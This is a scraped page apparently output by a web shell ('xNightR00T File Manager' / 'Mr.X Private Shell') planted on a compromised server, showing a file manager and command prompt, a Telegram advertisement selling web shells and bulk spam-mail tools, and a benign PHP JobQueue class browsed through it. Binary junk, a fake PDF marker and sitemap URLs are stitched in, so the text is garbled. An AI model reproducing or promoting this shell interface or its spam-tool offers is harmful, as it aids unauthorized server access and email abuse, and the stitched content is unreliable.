xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace JobQueue\Model;

use ZendJobQueue;
use JobQueue\Model\RecurringJobSchedule;

class RecurringJob
{
    /**
     * @var integer
     */
    private $id = null;

    /**
     * @var integer
     */
    private $type = null;

    /**
     * @var string
     */
    private $script = null;

    /**
     * @var string
     */
    private $name = null;

    /**
     * @var integer
     */
    private $priority = null;

    /**
     * @var bool
     */
    private $persistent = false;

    /**
     * @var integer
     */
    private $status = null;

    /**
     * @var string
     */
    private $vars = null;

    /**
     * @var string
     */
    private $schedule = null;

    /**
     * 
     * @var \JobQueue\Model\RecurringJobSchedule
     */
    private $parsedSchedule = null;

    /**
     *
     * @var
     */
    //private $parsedSchedule = null;

    /**
     * @var string
     */
    private $httpHeaders = null;

    /**
     * @var string
     */
    private $lastRun = null;

    /**
     * @var string
     */
    private $nextRun = null;

    /**
     * Creates a job with given properties
     */
    public function __construct(array $jobProperties = null)
    {
        if (is_array($jobProperties)) {
            foreach ($jobProperties as $key => $val) {
                switch ($key) {
                    case 'id':
                        $this->setId($val);
                        break;
                    case 'type':
                        $this->setType($val);
                        break;
                    case 'status':
                        $this->setStatus($val);
                        break;
                    case 'script':
                        $this->setScript($val);
                        break;
                    case 'name':
                        $this->setName($val);
                        break;
                    case 'priority':
                        $this->setPriority($val);
                        break;
                    case 'persistent':
                        $this->setPersistent($val);
                        break;
                    case 'vars':
                        $this->setVars($val);
                        break;
                    case 'schedule':
                        $this->setSchedule($val);
                        $this->setParsedSchedule(new RecurringJobSchedule($val));
                        break;
                    case 'last_run':
                        $this->setLastRun($val);
                        break;
                    case 'next_run':
                        $this->setNextRun($val);
                        break;
                    case 'http_headers':
                        $this->setHttpHeaders($val);
                        break;
                }
            }
        }
    }

    /**
     * Get the $parsedSchedule
     */
    public function getParsedSchedule()
    {
        return $this->parsedSchedule;
    }

    /**
     * @param stdClass $parsedSchedule
     */
    public function setParsedSchedule($parsedSchedule)
    {
        $this->parsedSchedule = $parsedSchedule;
    }

    /**
     * @param integer
     */
    public function setId($id)
    {
        $this->id = $id;
    }

    /**
     * @return integer
     */
    public function getId()
    {
        return $this->id;
    }

    /**
     * @param integer
     */
    public function setType($type)
    {
        $this->type = $type;
    }

    /**
     * @return integer
     */
    public function getType()
    {
        return $this->type;
    }

    /**
     * @param integer
     */
    public function setStatus($status)
    {
        $this->status = $status;
    }

    /**
     * @return integer
     */
    public function getStatus()
    {
        return $this->status;
    }

    /**
     * @return bool
     */
    public function isSuspended()
    {
        return $this->status === \JobQueue\JobQueueInterface::STATUS_SUSPENDED;
    }

    /**
     * @param string
     */
    public function setScript($script)
    {
        $this->script = $script;
    }

    /**
     * @return string
     */
    public function getScript()
    {
        return $this->script;
    }

    /**
     * @param string
     */
    public function setName($name)
    {
        $this->name = $name;
    }

    /**
     * @return string
     */
    public function getName()
    {
        return $this->name;
    }

    /**
     * @param integer
     */
    public function setPriority($priority)
    {
        $this->priority = $priority;
    }

    /**
     * @return integer
     */
    public function getPriority()
    {
        return $this->priority;
    }

    /**
     * @param bool
     */
    public function setPersistent($persistent)
    {
        $this->persistent = $persistent;
    }

    /**
     * @return bool
     */
    public function getPersistent()
    {
        return $this->persistent;
    }

    /**
     * @param string
     */
    public function setVars($vars)
    {
        $this->vars = $vars;
    }

    /**
     * @return string
     */
    public function getVars()
    {
        return $this->vars;
    }

    /**
     * @param string
     */
    public function setSchedule($schedule)
    {
        $this->schedule = $schedule;
    }

    /**
     * @return string
     */
    public function getSchedule()
    {
        return $this->schedule;
    }

    /**
     * @param string
     */
    public function setLastRun($lastRun)
    {
        $this->lastRun = $lastRun;
    }

    /**
     * @return string
     */
    public function getLastRun()
    {
        return $this->lastRun;
    }

    /**
     * @param string
     */
    public function setNextRun($nextRun)
    {
        $this->nextRun = $nextRun;
    }

    /**
     * @return string
     */
    public function getNextRun()
    {
        return $this->nextRun;
    }

    /**
     * @param string
     */
    public function setHttpHeaders($httpHeaders)
    {
        $this->httpHeaders = $httpHeaders;
    }

    /**
     * @return string
     */
    public function getHttpHeaders()
    {
        return $this->httpHeaders;
    }

    /**
     * @return string
     */
    public function getPriorityDisplay()
    {
        // TRANLSATE
        $display  = array(
            \JobQueue\JobQueueInterface::PRIORITY_LOW => _t('low'),
            \JobQueue\JobQueueInterface::PRIORITY_NORMAL => _t('normal'),
            \JobQueue\JobQueueInterface::PRIORITY_HIGH => _t('high'),
            \JobQueue\JobQueueInterface::PRIORITY_URGENT => _t('urgent'),
        );
        $priority = $this->getPriority();
        if (isset($display[$priority])) {
            return $display[$priority];
        } else {
            return _t("Unknown (%s)", array($priority));
        }
    }
}

Filemanager

Name Type Size Permission Actions
JobsSet.php File 510 B 0644
Mapper.php File 13.24 KB 0644
QueueStats.php File 1.35 KB 0644
RecurringJob.php File 6.65 KB 0644
RecurringJobSchedule.php File 8.04 KB 0644
RulesSet.php File 512 B 0644
Statistics.php File 5.4 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml